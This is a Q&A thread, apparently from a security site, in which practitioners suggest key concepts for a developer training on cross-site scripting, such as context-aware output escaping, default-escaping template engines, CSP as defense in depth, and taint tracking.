What are some important concepts to teach developers about cross-site scripting (XSS)?

Question

I'm helping with a one-hour training for developers (~100 of them) on cross-site scripting. What are some concepts you think are indispensable to get across to them? Right now we have:

Difference between reflected and stored
Layers of defense (WAFs, browser defenses, server headers, and secure coding)
Secure coding and context of encoding parameters

And most of all, the potential impact of vulnerabilities.

just teach them how to stop it (CSP) instead of pounding nitty gritty vector details. — dandavis, Aug 31 '16 at 20:23
@dandavis it is still very common to have inline js (stackoverflow has it, and even google has it), so when maintaining an existing application, CSP doesn't seem like a reasonable solution. Also, afaik IE still doesn't fully support CSP, and CSP doesn't prevent HTML and CSS injection. At best, it seems like a good defense in depth to me, not a primary solution. — tim, Aug 31 '16 at 20:34
@tim nothing's perfect, but clearly, CSP is the way forward, and one would be remiss to omit it. feel free to diminish the rich user interface of any non-supporting browser (eg block/break js on the page); the user pool is small and shrinking. it's easy to test for vuln inline and redirect to non-js view — dandavis, Aug 31 '16 at 20:46
@dandavis I don't think there is a way to effectively block js on non-supporting browsers. I do think that CSP is a great tool if the application allows using it to full potential (which most currently don't), so it should definitely be mentioned, but it doesn't replace existing solutions (ie HTML encode by default, CSS/JS encode if needed). — tim, Aug 31 '16 at 20:55
@dandavis, secure server-side code should be first line of defense. as for CSP, check this out: https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/45542.pdf They say, " In this paper, we take a closer look at the practical benefits of adopting CSP and identify significant flaws in real-world deployments that result in bypasses in 94.72% of all distinct policies. " 94%!!!!! No, I did not read the paper yet. It was just published. — mcgyver5, Sep 02 '16 at 18:25
@mcgyver5: i agree servers should protect you anyway. if xsp is not 100% bad in the link, then it _can_ work. i just read it and 87% of them "failed" because they used ’unsafe-inline’, which should not be used without nonces (duh). stay away from jsonp on CDNs, don't forget to block flash, and it works well. good info though, thanks! also a backend takeaway: sanitize user input, including jsonp cb names... — dandavis, Sep 02 '16 at 22:57
I thought the Rails guide had a good section on security. http://guides.rubyonrails.org/security.html — Chloe, Sep 03 '16 at 04:57

score 77 · Answer 1 · answered Aug 31 '16 at 19:22

77

From a developer's perspective, the first two points you have are not very relevant. Stored and Reflected XSS have the same mitigation: properly escape things you output according to their context. Layers of defense will likely only be viewed as an excuse for poorly implementing this mitigation: "The WAF will catch it for me."

Instead, focus on these code hygiene practices:

Validate, not escape, at input. Input validation should be only for ensuring the input makes sense, not that it is "safe". It's impossible to know at this point whether it is safe, since you don't know all the places it will be used.
Assume all data is unsafe. Never make the assumption that some data has been escaped, or does not include tags or quotes or entities or whatever. Understand that unsafe input can come from anywhere: HTTP headers, cookies, URL parameters, bulk import data, etc.
Escape at point of use. Escape the data for the context in which it is used, when it is used. Only want to escape once to improve performance? Name the destination variable according to where it is safe to use: jsstringsafeEmail, htmlattrsafeColor, htmltextsafeFullName, etc.

answered Aug 31 '16 at 19:22

bonsaiviking

11,316
1
27
50

7

+1, the three rules summarize most issues very well. But I would still mention WAF, headers, and browser filters. Otherwise a developer might later find out about them or already know about them, and determine exactly what you fear, but without an explanation why it will not be enough (or even worse, they may try an XSS in Chrome, see that it fails, and decide that the app is safe). Additionally, depending on the application, developers may actually be responsible for setting headers, so they should know that they exist and may provide some additional protection in some situations. – tim Aug 31 '16 at 19:29
14

**Validate, not escape, at input**, love it! – Matthew Aug 31 '16 at 22:16
3

First point is overused. I should be able to have username `<"hotmomma62">`, dang it! – Paul Draper Sep 01 '16 at 02:51
4

@PaulDraper Well, that decision should be made by the business logic of the app, not by the developer's sense of security. That's the difference between validation (does this fit our intended use cases/requirements?) vs escaping (will this break something?) – bonsaiviking Sep 01 '16 at 03:00
2

@bonsaiviking, it absolutely depends on the tech implementation though. Is this being templated into HTML? JS? SQL? XML? Command line argument? Somewhere else? What encodings? This approach depends on knowing all the places or ways it will be used, which is one of the issues. The robust answer is to escape it at the use site. Anything else is hokey. – Paul Draper Sep 01 '16 at 03:14
Your example variables are a good use of Hungarian notation (congrats), but I'd probably drop the "safe" part, as it only tells us what the previous prefix did. – John Dvorak Sep 03 '16 at 11:34
I'm taking the WAF part out of the presentation since most of these developers don't have a WAF in front of their applications and even if they did, they won't have anything to do with it and shouldn't be expecting it or relying on it. Also, good point about "Validate, not escape at input". But, I still think "defense in depth (i.e. layers) " should be taught because developers miss things. Security headers and regular security scans would be considered defense in depth and can mitigate if they miss something. – mcgyver5 Sep 06 '16 at 13:31

score 19 · Answer 2 · edited Sep 01 '16 at 14:41

What are some concepts you think are indispensable to get across to them?

Difference between Reflected and stored -- I don't really care.
Layers of defense -- Yes. Many developers do not understand "defense in depth". Assume that every other mitigation has failed and your code is the last thing that is standing between the attacker and the vulnerable resource. What can you do to mitigate the attack?
Secure coding and context of encoding parameters -- absolutely.
and most of all, the potential impact of vulnerabilities. -- absolutely

What else? The big thing missing from your list is: there are a great many tools and techniques that can all be used to mitigate these potential vulns; defense in depth suggests that we use as many of them as is feasible.

Be secure by design, secure by default. Think about vulnerabilities at all stages of design and implementation. Make sure that you are opting out of being secure when necessary not opting in when necessary.
Make formal threat models. Where can hostile data enter a system, and where can it leave? Which sub-systems trust each other, and which do not? If you don't know where the boundaries are, it is difficult to harden them against attack.
Strings are the enemy. Data should flow around in smart objects that can be composed intelligently, not strings that can be concatenated and split.
If you are using a language that has a type system, capture whether the data is tainted or untainted in the type system. Make the compiler tell you that you're assigning tainted data into a context that expects untainted data.
If you don't have a compiler finding your bugs for you, emulate a type system in your naming discipline. If a variable contains tainted data, have "tainted" somewhere in its name. If you assign a tainted value to a variable that does not have "tainted" in its name, you've just caught a problem at code review time rather than when the attacker succeeds.
Use static analysis tools designed by security professionals to find these sorts of problems; pay careful attention to the output, even false positives. A false positive is an indication that the code could not be seen to be correct by an analyzer; that means that it also likely cannot be seen to be correct by a human. Fix the code so that the tool does not find the false positive anymore.
Test everything like an attacker, not a user. If there is code that sanitizes input, task a member of your team with attacking it. Sanitizer bugs are a common source of hard-to-spot vulnerabilities.
Make tests for misconfigurations in production. XSS vulns can be caused by accidentally turning off some validation or sanitization for debugging or testing purposes and forgetting to turn it back on, pushing the wrong configuration to production, and so on.
And so on.

Great answer. This is incredibly valuable for a developer. Especially love writing automated tests to ensure vulnerabilities are addressed. — scrowler, Sep 01 '16 at 11:35
In respect to the naming discipline, this is what hungarian notation originally set out to be used for. A relatively famous [article by Joel Spolskey](http://www.joelonsoftware.com/articles/Wrong.html) discusses the exact case of marking strings as being safe or unsafe. I won't make any comment on whether or not hungarian notation is the right naming system, but it goes to show that effective use of variable names to describe the variables' qualities is always a good thing (within reason). — Pharap, Sep 03 '16 at 06:22

score 9 · Answer 3 · answered Aug 31 '16 at 19:18

You covered most of the basics. To extend a bit on your points (some of these will seem obvious to most readers here, but may not necessarily be obvious to all developers):

XSS can happen via GET and POST.
XSS is also an issue in admin backends.
DOM based XSS exists.
Browser defenses exist, but should not be relied upon. The same goes for WAFs and server headers.
Encoding should happen when printing, not when receiving input.
Context really is important. HTML encoding is not enough in some situations.
JavaScript and CSS escaping/encoding are difficult. Using an existing library is recommended.
All parameters should be encoded. It's not a good approach to only encode parameters that seem unsafe.
Additional input filtering is highly recommended (eg if you need an integer, check that it is actually an integer, ideally localized in some Input class), but should never be the only line of defense.

But the most important point in my opinion: HTML Encoding should happen by default, by using a template engine that encodes all parameters by default.

If encoding happens all over the place, it's too easy to forget it just once. It is of course still important to take care of all the situations where HTML encoding is not enough, but most XSS vulnerabilities will be prevented by default encoding.

XSS is independent of HTTP method - if a form or query string uses PUT or PATCH etc. (not just GET and POST - basically any data entry) there is potential for XSS vulnerabilities. — Michael, Sep 01 '16 at 08:50

Luis Casillas · Answer 4 · 2016-08-31T19:55:43.107

I think the two most important lessons to teach are these:

If you're generating markup or any other structured textual representation (e.g., JSON, SQL, URL query strings) in an ad-hoc manner by concatenating strings together, then stop what you're doing immediately, and find or build a centralized and safe library for markup or DOM generation.
Don't trust XSS prevention strategies that require you to do any of the following:
- Guess what the attacker will attempt or otherwise try to outsmart the attacker. In particular, input-side filters have a history of being outsmarted by attackers, and should be regarded with suspicion.
- Identify, time and time again in different contexts, which variables are "untrusted" inputs that you must then treat exceptionally. (Rather, all inputs should be untrusted by default—you should have to opt out of XSS protection, not opt in to it.)

On my first point: nearly all injection problems arise from working at the wrong level of abstraction: programmers are concatenating strings in situations where they ought to be using higher-level operations that abstract away from the correct way of doing things. And this means that:

Programmers end up tackling the exact same, tricky problem over and over (correct escaping of string values in the context in which they're inserted). Even if they got it right every single time (not likely!), the solutions would never get reused.
Since the responsibility for correctly escaping the string values is diffused all over the code base instead of being concentrated in one spot, auditing the code for security and fixing the problems becomes a few orders of magnitude harder.

On the second point: a good lesson on the dangers of relying on input-side filtering would be to browse through OWASP's XSS Filter Evasion Cheat Sheet . Think of that page as documenting one failed attempt after another and another at solving XSS through input-side filtering, and the cleverness that the attackers were able to use to get around it.

You also often see much advice that talks about "untrusted" inputs and how to process them, which is fraught with dangers because:

Figuring out which inputs can be trusted is a lot of work, particularly when you have to do it over and over;
You might incorrectly judge which inputs are trustworthy;
Inputs that can be trusted today may not be trustworthy tomorrow.

OWASP's XSS Prevention Cheat Sheet is another really excellent document that follows my two points. It focuses on how to safely insert arbitrary strings into dynamically generated HTML, CSS and Javascript documents. If you solve that problem in one place (either in a third-party library or in your codebase) and apply that solution consistently throughout, you'll do very well—you'll have "cut the jugular" of XSS vulnerabilities.

+1 for your first point (the rest of the answer is good too). Just using the right abstraction takes care of a lot of potential security issues, and is just good practice anyway. — Matthew Crumley, Aug 31 '16 at 20:34

score 1 · Answer 5 · answered Aug 31 '16 at 19:30

You've already listed some of the most important concepts - the only thing I would add is the ubiquity and ease of testing for XSS vulns. XSS is often the first vulnerability that is taught, and after SQL injection possibly the most famous. It is also trivial to scan for, and many application scanners like burp and w3af will be able to detect XSS automatically.

Understanding this important because it outlines why xss still exists: pretty much all sites have some kind of xss protections in place, but are still vulnerable when a clever tester or scanner is able to find user input that the developer's forgotten about. To securely develop xss-free software, the developers have to be conscious about attackers using odd vectors to submit payloads - e.g. HTTP headers, drop down menus, anything that can be edited in an HTTP proxy.

score 1 · Answer 6 · answered Sep 01 '16 at 14:13

The most important point to make, IMHO, is that you should know what a variable (or database field) contains. You must know whether it's text (and what charset/encoding it is, in that case), or it's HTML (or an HTML attribute, which is yet another type of data), or SQL, etc.

Then, you need to apply to proper conversions when you need to move from one to the other.

The big issue is that in many cases, the representation of a piece of text (probably the most common type of data you can manipulate) is the same whether it's text, HTML, SQL, etc. (the text "abc" is the same as the HTML abc or the SQL 'abc') and for this reason people tend to concatenate bits together without any conversion.

But that will break as soon as you encounter any characters that have a special meaning in one of the contexts. This not only leads to security issues (both XSS and SQL injections), but also to formatting issues (we have all seen sites which start showing HTML entities such as < when they should be displaying <), as people either forget the conversion, or do it multiple times.

It is quite rare that you actually need to allow input of actual HTML. In most cases, you want text. Just keep the text as it is, manipulate it as it is. But once you want to display it (on an HTML page), convert it to HTML (using standard and tested libraries/frameworks, not your improvised regex-based search-and-replace).

Likewise, you convert it when you want to build an SQL request (using parameterised queries, preferably). But you still store it exactly as it is.

Many frameworks will add abstraction layers that will "hide" all of this if you actually use them. But we all know that even with the best tools, you'll always end up with someone trying to build a bit of HTML themselves, so they need to know what needs to be done if they do so.

If you want/need to manipulate actual HTML, then you enter a completely different dimension in terms of XSS issues. Note sure that can be covered in an hour...

paj28 · Answer 7 · 2016-09-02T07:56:55.193

XSS is serious

Perform a demonstration of XSS to show that it has a real-world impact, beyond alert('xss').

XSS affects us

Provide some statistics, e.g. 17 XSS flaws in our products were identified in penetration tests during the past year.

The solution is escaping

Show them the difference between code that doesn't escape, and is vulnerable, and code that does escape. Attempt the demonstration again and see how it fails.

Good coding practice

Show them good ways of performing escaping with the languages and frameworks in use in your company. Ideally a template engine that performs automatic escaping. If you have a single language/framework across the company this is easier. Otherwise, show an example, and tell them to read up on the particular framework they are using.

Common pitfalls

Page context. Even if you have an escaping template engine, untrusted data within a <script> tag can cause XSS.

What data is untrusted? e.g if you fetch an RSS feed from an external site, it is still an XSS risk, even though it's not direct user input.

DOM XSS - using JavaScript eval and document.write can cause XSS.

Defence in depth

CSP is an excellent defence in depth, but may be difficult to implement.

Cookie options and request validation can be easily implemented, but are only partial defences.

Ask for help

When doing something difficult - such as allowing users to use limited HTML tags in comments - ask a security specialist for assistance.

What are some important concepts to teach developers about cross-site scripting (XSS)?

7 Answers7

Linked